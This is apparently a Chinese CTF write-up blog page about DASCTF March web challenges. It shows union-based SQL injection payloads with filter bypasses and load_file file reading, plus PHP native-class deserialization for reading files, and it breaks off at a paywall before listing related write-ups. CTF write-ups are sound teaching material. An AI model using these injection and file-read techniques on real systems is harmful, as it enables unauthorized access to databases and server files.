DASCTF-三月赛-web题复现

最新推荐文章于 2024-10-20 19:43:17 发布
最新推荐文章于 2024-10-20 19:43:17 发布
阅读量1k 收藏 2
点赞数 1
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45800126/article/details/115730393
版权
本文详细介绍了DASCTF三月赛的Web题目,包括BestDB的Union SQL注入,ez_serialize利用PHP原生类读取文件,以及ez_login的SSRF与SQL盲注组合攻击。在BestDB中,通过闭合双引号绕过过滤,进行Union查询获取flag。ez_serialize中,利用DirectoryIterator和SplFileObject类读取文件内容。ez_login部分,通过构造PHP_SESSION_UPLOAD_PROGRESS sessionID绕过会话检查,结合文件包含漏洞实现攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

title: DASCTF 三月赛 web题复现
date: 2021-04-07 15:04:52
tags: DASCTF

BestDB

0x01

源码给了查询语句

$sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\"";

过滤单引号,但没过滤双引号,所以选择闭合后面的用户名进行union查询

查表名

query=-1"/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema=database()%23
//f1agdas,users

查字段

query=-1"/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name="f1agdas"%23
//id,f1agdas

查数据

query=-1"/**/union/**/select/**/f1agdas,2,3/**/from/**/f1agdas%23
//flag.txt

返回一个文件名,使用load_file读取/flag.txt获得flag,flag被过滤了,可以使用16进制编码绕过

query=-1"/**/union/**/select/**/load_file(0x2F666C61672E747874),2,3%23

ez_serialize

0x01

题目给了源码,序列化的题目,但是源码中并没有可以利用的类,所以是php原生类的利用

spl,标准php类库,里面存着一些php原生类,其中有可以遍历目录或读取文件

DirectoryIterator 遍历目录 直接echo会输出目录下的.(即表示当前目录的符号)

FilesystemIterator 遍历目录 直接echo会输出目录下第一个文件夹或文件名

SplFileObject 读取文件内容,按行读取,跨行需要遍历

源码如下

 <?php
error_reporting(0);
highlight_file(__FILE__);

class A{
   
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
   
        $this->class = "B";
        $this<
最低0.47元/天 解锁文章
安恒七月DASCTF_web复现
风过江南乱的博客
08-04 1217
前言 比时没时间参加,今天因为WMCTF不会做。。。又恰好开放复现环境,所以来看看 神仙打架,菜鸡告辞。 目 1、Ezfileinclude 好像不难。但复现的时候始终没找到flag文件在哪。。。 打开一张动漫,F12,看到提示。 多次刷新发现参数t是动态的,结合格式确定为当前时间戳,然后是参数f,看到 == base64解码得到gqy.jpg 。 所以明了请求方式,只需要获取当时间戳和访问文件的base64的编码即可。 这些问都可以用python解决,现在重点是读什么,怎么读? 首先想到读
2022DASCTF X SU 三月春季挑战-reverse-easyre(复现
ookami6497的博客
04-03 988
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
Mar Dasctf web
weixin_45805993的博客
04-09 246
参考大佬http://www.plasf.cn/articles/dasctf202103.html ez_serialize <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"
[2022DASCTF Apr X FATE 防疫挑战]web复现
cosmoslin的博客
05-02 1082
warmup-php 给了源码: <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public function __
DASCTF Oct X web
Sk1y的博客
11-16 277
文章目录Web 欢迎来到魔法世界我的解法师傅的wpMisc WELCOME DASCTFxJlenu Web 欢迎来到魔法世界 打开容器,即进行php代码审计 <?php highlight_file('index.php'); extract($_GET);//将GET方式传递的参数赋值 error_reporting(0); function String2Array($data)//eval那里存在命令执行 { if($data == '') return array(); @
DASCTF 四月 web部分
weixin_43610673的博客
04-25 2316
Ezunserialize 反序列化POP链、字符逃逸 POP链构造起来不难,字符逃逸参考:https://xz.aliyun.com/t/6588 https://blog.youkuaiyun.com/assasin0308/article/details/103711024 打开送源码 POP链构造: __toString() //把类当作字符串使用时触发,返回值需要为字符串 B类的__destru...
CSP-J模拟:真复现
08-02
【CSP-J模拟:真复现】 CSP-J(中国计算机学会青少年软件编程能力认证初级)是一项针对青少年的编程能力评估考试,旨在检验考生的编程基础和逻辑思维能力。本模拟名为FCC - PCS-J,旨在与CSP-J保持相似的难度...
DASCTF】2020年DASCTF4月春季战复现web------Ezunserialize
weixin_44164784的博客
05-02 797
Ezunserialize **考点:**反序列化POP链、字符逃逸 看标大概就知道关于序列化的,打开链接给了我们源代码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function r...
DASCTF 八月 misc部分复现
wu_zh1_hui的博客
08-28 1543
1.双重图格 目给了两章图片和一个hint的excel文件,写的时候一直以为是文件外藏了什么,发现其实是空格隐藏数据,进去之后把空格都替换掉就发现提示 得到 Insert:OFFSET28354h 意思是在28354h这个位置插入什么 把图片放到010里看一下, 有一块识别不出来的数据,结合前面的提示, 把这一块剪切下来放到提示的位置。(这里我看了半天大佬的wp没懂,问了群里的师傅才知道,谢谢好心的师傅们) 这里涉及到fdat的数据,这里是apng的文件,要用谷歌或者火狐浏览器查看才行(我的浏
DASCTF 2022九月WEB
weixin_43952190的博客
09-22 880
CTF
DASCTF 2024金秋十月REwp
最新发布
sln_1550的博客
10-20 1017
3RE,差一点就AK了,可能好久没打比了,技能有所下降,还是需要经常摸一摸工具。
[DASCTF八月挑战]easymath
a5555678744的博客
08-31 1047
DASCTF八月的Crypto方向,拿下其他两道很简单,但是这道最多人解出来的反而解不出来。打完比回来看其他师傅写的wp,说是这是TSGCTF原,所以直接放弃思考,上大佬的wp,我看看大佬这个wp,感觉这还是有点东西的,里面涉及的基础的一些数学知识还是值得总结总结。 目 assert(len(open('flag.txt', 'rb').read()) < 50) assert(str(int.from_bytes(open('flag.txt', 'rb').read...
DASCTF 2022十月挑战 web
qq_61768489的博客
11-04 878
拿到源码就看哪里可以命令执行RCE,看那些php特殊函数,这里的话 就是`call_user_func($this->cmd, $this->content);首先destruct就直接调用了这两个方法,newnewnew()里面的参数我们是可控的属性,flag()里调用了不存在的方法。这里为何还需要User对象用一个不存在的属性实例化 Test()类,确实不太理解,有和没有的区别如下。admin被注册了,考虑如何登录admin,用普通用户登录一下,有发布文章,修改密码,查看文章的功能。
DASCTF 3月Web
D.MIND 的博客
04-08 954
BestDB $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 目过滤了单引号和空格,因为这条语句的特殊,我们可以利用双引号在后面部分进行闭合。空格就用/**/ 查列数: 1"/**/order/**/by/**/3# 1"/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.
2020年DASCTF五月线上-WEB-小红花
Bcdlbgm的博客
05-24 1282
小红花 很明显是命令执行,但肯定有过滤. 首先看函数shell_exec他会执行系统命令,并把执行结果返回出来。但看提示似乎没有把返回结果打印测试后也证实了这个想法。 那么就首先尝试外带了。 dnslog外带-失败 尝试过以后payload都没有成功。听别人说之前有人成功过是因为非预期后来再进行尝试就没有成功了。 echo Y3VybCBibC50ZXN0LmRuc2xvZy5saW5rIA==|base64 -d |sh echo MN2XE3BAMJWC45DFON2C4ZDOONWG6ZZONRUW
2020 DASCTF四月春季战-Web
weixin_43952190的博客
05-09 966
0x01 Esunserialize 构造反序列化Pop链 字符逃逸 上源码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data); }
DASCTF 2024 七月 web Sanic‘s revenge&&ciscn 2024 sanic的复盘
weixin_73307794的博客
08-05 983
第一次看到sanic其实是不知所措的,感觉这个虽然是眼熟,但也仅限于眼熟,显而易见的,国没有做出来,也因为一些心态问没有做复盘,时隔近两月,慢慢调整好心态后终于是借着gxn师傅的Sanic revenge进行了整体的复盘这里放上gxn师傅的博客。
WebDASCTF2022.07赋能
uuzeray的博客
04-14 790
这类常用的字符和关键字,可以用 attr() 配合 unicode 编码绕过。JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。的形式来bypass。Show类文件操作可以触发phar反序列化。使用gzip压缩来绕过对文件内容的检测。监听,拿到flag(补全{}即可)进来有两个功能,一个查看,一个上传。过滤print 关键字,则只能用。访问/SUPPERAPI.php。前端过滤不用管,禁用js即可。图片查看功能可以任意文件读。读文件触发phar反序列化。过滤{{}},我们可以用。
DASCTF 2023 & 0X401七月暑期挑战web复现
weixin_63231007的博客
08-02 1403
python原型链污染&xpath注入&pearcmd文件包含&django框架
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值